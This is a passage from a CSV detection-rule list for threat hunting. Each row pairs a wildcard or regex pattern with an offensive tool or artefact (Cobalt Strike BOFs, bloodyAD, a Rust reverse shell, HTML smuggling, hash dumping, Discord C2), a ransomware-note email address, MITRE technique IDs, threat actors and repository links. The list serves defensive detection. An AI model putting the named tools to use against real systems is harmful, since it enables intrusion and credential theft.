"*bloodyAD.py*",".{0,1000}bloodyAD\.py.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36093" "*bloodyAD-main*",".{0,1000}bloodyAD\-main.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36094" "*bluecrap@my.com*",".{0,1000}bluecrap\@my\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36095" "*BlWasp/rs-shell*",".{0,1000}BlWasp\/rs\-shell.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","36097" "*BlWasp/syscalls-rs.git*",".{0,1000}BlWasp\/syscalls\-rs\.git.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","36098" 
"*bm90cmVkYW1lY2hlYXRzdG93aW4-*",".{0,1000}bm90cmVkYW1lY2hlYXRzdG93aW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","36099" "*bmarchev/Forensike*",".{0,1000}bmarchev\/Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","36100" "*bmdyy/discord-c2*",".{0,1000}bmdyy\/discord\-c2.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","1","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","36101" "*bob@moozle.wtf*",".{0,1000}bob\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","#email","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36104" "*BobTheSmuggler.py*",".{0,1000}BobTheSmuggler\.py.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","36105" "*BobTheSmuggler-main*",".{0,1000}BobTheSmuggler\-main.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","36106" "*BOF prototype works!*",".{0,1000}BOF\sprototype\sworks!.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 
- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","0","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","36107" "*bof*/CredEnum/*",".{0,1000}bof.{0,1000}\/CredEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","36108" "*BOF.NET.git*",".{0,1000}BOF\.NET\.git.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36109" "*BOF.NET-main*",".{0,1000}BOF\.NET\-main.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36110" "*BOF/*procdump/*",".{0,1000}BOF\/.{0,1000}procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","36111" "*bof_allocator*",".{0,1000}bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36112" "*bof_helper.py*",".{0,1000}bof_helper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","N/A","10","10","228","43","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z","36113" "*bof_net_user.c*",".{0,1000}bof_net_user\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","36114" "*bof_net_user.o*",".{0,1000}bof_net_user\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used 
when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","36115" "*bof_pack.py *",".{0,1000}bof_pack\.py\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","36116" 
"*bof_reuse_memory*",".{0,1000}bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36117" "*BOF2shellcode*",".{0,1000}BOF2shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36118" "*bof2shellcode.py*",".{0,1000}bof2shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36119" "*BOF-DLL-Inject*",".{0,1000}BOF\-DLL\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","36120" "*bofentry::bof_entry*",".{0,1000}bofentry\:\:bof_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 